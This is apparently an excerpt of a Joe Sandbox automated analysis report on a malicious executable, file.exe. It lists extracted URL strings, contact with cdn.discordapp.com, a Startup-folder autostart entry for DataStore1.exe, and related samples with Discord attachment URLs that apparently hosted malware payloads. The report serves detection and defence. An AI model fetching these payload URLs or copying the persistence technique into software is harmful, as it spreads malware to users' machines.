                                                                                                                  https://v8.dev/blog/v8-release-89file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                    high
                                                                                                                    https://github.com/nodejs/node/issues/39707file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                      high
                                                                                                                      https://github.com/nodejs/node/pull/12607file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412976136.000001AB73981000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                        high
                                                                                                                        https://tc39.es/ecma262/#sec-IsHTMLDDA-internal-slotfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412639214.0000019143401000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                          high
                                                                                                                          https://www.ecma-international.org/ecma-262/#sec-line-terminatorsfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                            high
                                                                                                                            https://www.unicode.org/Public/UNIDATA/EastAsianWidth.txtfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412639214.0000019143401000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                              high
                                                                                                                              https://www.ecma-international.org/ecma-262/8.0/#prod-Patternfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                high
                                                                                                                                http://html4/loose.dtdfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://sourcemaps.info/spec.htmlfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://invisible-island.net/xterm/ctlseqs/ctlseqs.htmlfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://github.com/nodejs/node/pull/12342file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://bugs.chromium.org/p/v8/issues/detail?id=6593file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2412486456.000002E8B60C1000.00000004.00001000.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://github.com/nodejs/node/issues/39758file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://www.unicode.org/copyright.htmlDataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://github.com/nodejs/node/pull/34375file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2413111118.000001EBEEA01000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://nodejs.org/download/release/v16.16.0/win-x64/node.libfile.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ExtendedAtomfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://.cssfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://github.com/nodejs/node/pull/34010file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2413111118.000001EBEEA01000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://heycam.github.io/webidl/#dfn-default-iterator-objectfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412755369.0000027748301000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://heycam.github.io/webidl/#es-iterable-entriesfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412755369.0000027748301000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://heycam.github.io/webidl/#es-interfacesfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2412486456.000002E8B60C1000.00000004.00001000.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://html.spec.whatwg.org/multipage/browsers.html#concept-origin-opaquefile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412755369.0000027748301000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://github.com/da-x/rxvt-unicode/tree/v9.22-with-24bit-colorfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://github.com/nodejs/node/issuesfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2412486456.000002E8B60C1000.00000004.00001000.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://www.ecma-international.org/ecma-262/8.0/#prod-HexDigitsfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://github.com/addaleax/eventemitter-asyncresourcefile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412639214.0000019143401000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://tc39.github.io/ecma262/#sec-object.prototype.tostringfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://url.spec.whatwg.org/#urlsearchparamsfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2412486456.000002E8B60C1000.00000004.00001000.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://crbug.com/v8/8520file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://github.com/chalk/supports-colorfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://heycam.github.io/webidl/#Replaceablefile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2412486456.000002E8B60C1000.00000004.00001000.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://github.com/nodejs/node/pull/30380#issuecomment-552948364file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2412486456.000002E8B60C1000.00000004.00001000.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://html.spec.whatwg.org/multipage/timers-and-user-prompts.html#dom-setintervalfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412858248.000000B2F61C1000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://heycam.github.io/webidl/#dfn-class-stringfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412755369.0000027748301000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://heycam.github.io/webidl/#dfn-iterator-prototype-objectfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412755369.0000027748301000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          http://.jpgfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://nodejs.org/api/cli.html#cli_unhandled_rejections_mode).file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412755369.0000027748301000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://www.ecma-international.org/ecma-262/8.0/#prod-ControlLetterfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://www.ecma-international.org/ecma-262/8.0/#prod-Quantifierfile.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://github.com/nodejs/node/pull/38614)file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2412486456.000002E8B60C1000.00000004.00001000.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://github.com/nodejs/node/issues/10673file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://github.com/acornjs/acorn/issues/575file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                        • 75% < No. of IPs
                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                        162.159.135.233
                                                                                                                                                                                                        cdn.discordapp.comUnited States
                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                        IP
                                                                                                                                                                                                        127.0.0.1
                                                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                        Analysis ID:1555565
                                                                                                                                                                                                        Start date and time:2024-11-14 05:14:08 +01:00
                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                        Overall analysis duration:0h 8m 58s
                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                        Run name:Run with higher sleep bypass
                                                                                                                                                                                                        Number of analysed new started processes analysed:12
                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                        Sample name:file.exe
                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                        Classification:mal76.adwa.evad.winEXE@15/8@1/2
                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                        • Successful, ratio: 50%
                                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                                        • Successful, ratio: 98%
                                                                                                                                                                                                        • Number of executed functions: 30
                                                                                                                                                                                                        • Number of non-executed functions: 39
                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                                                        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                                                                                                                        • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                        • Execution Graph export aborted for target file.exe, PID 3472 because there are no executed function
                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                                                        05:15:15AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exe
                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                        162.159.135.233Cheat.Lab.2.7.2.msiGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                        • cdn.discordapp.com/attachments/1166694393298817025/1171047481182793729/2.txt
                                                                                                                                                                                                        #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • cdn.discordapp.com/attachments/1161633037004587060/1161731056462995496/lient.exe
                                                                                                                                                                                                        QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, AveMariaBrowse
                                                                                                                                                                                                        • cdn.discordapp.com/attachments/1152164172566630421/1153190859320328273/Vvdsupbjet.exe
                                                                                                                                                                                                        We7WnoqeXe.exeGet hashmaliciousAmadey RedLineBrowse
                                                                                                                                                                                                        • cdn.discordapp.com/attachments/878034206570209333/908097655173947432/slhost.exe
                                                                                                                                                                                                        mosoxxxHack.exeGet hashmaliciousAmadey RedLineBrowse
                                                                                                                                                                                                        • cdn.discordapp.com/attachments/710557342755848243/876828681815871488/clp.exe
                                                                                                                                                                                                        Sales-contract-deaho-180521-poweruae.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • cdn.discordapp.com/attachments/843685789120331799/844316591284944986/poiu.exe
                                                                                                                                                                                                        PURCHASE ORDER E3007921.EXEGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                        • cdn.discordapp.com/attachments/809311531652087809/839820005927550996/Youngest_Snake.exe
                                                                                                                                                                                                        Waybill Document 22700456.exeGet hashmaliciousNanocoreBrowse
                                                                                                                                                                                                        • cdn.discordapp.com/attachments/809311531652087809/839856358152208434/May_Blessing.exe
                                                                                                                                                                                                        COMPANY REQUIREMENT.docGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                        • cdn.discordapp.com/attachments/819674896988242004/819677189900861500/harcout.exe
                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                        cdn.discordapp.comhttps://cdn.discordapp.com/attachments/1284277835762110544/1305291734967779460/emu.exe?ex=67327f28&is=67312da8&hm=ea20e1c2a609dc1a0569bd4abb7e0da0a5e0671f3f7a388c1ed138f806c8e0c4&Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 162.159.135.233
                                                                                                                                                                                                        SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                        • 162.159.135.233
                                                                                                                                                                                                        segura.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                        • 162.159.135.233
                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                        • 162.159.129.233
                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Quasar, StealcBrowse
                                                                                                                                                                                                        • 162.159.134.233
                                                                                                                                                                                                        LDlanZur0i.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 162.159.135.233
                                                                                                                                                                                                        Fa1QSXjTZD.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 162.159.133.233
                                                                                                                                                                                                        xxImTScxAq.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 162.159.135.233
                                                                                                                                                                                                        FvmhkYIi5P.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 162.159.134.233
                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                        CLOUDFLARENETUSESTEEM ASTRO PARTICULARS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                        • 172.67.74.152
                                                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 104.21.80.55
                                                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 104.21.80.55
                                                                                                                                                                                                        KKjubdmzCR.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                        • 104.20.23.46
                                                                                                                                                                                                        https://storage.googleapis.com/windows_bucket1/turbo/download/TurboVPN_setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 172.64.41.3
                                                                                                                                                                                                        #U304a#U898b#U7a4d#U4f9d#U983c#U3001_20241113.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                                        uu8v4UUzTU.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                                        uu8v4UUzTU.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                                        ICBM.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                        • 104.26.8.242
                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
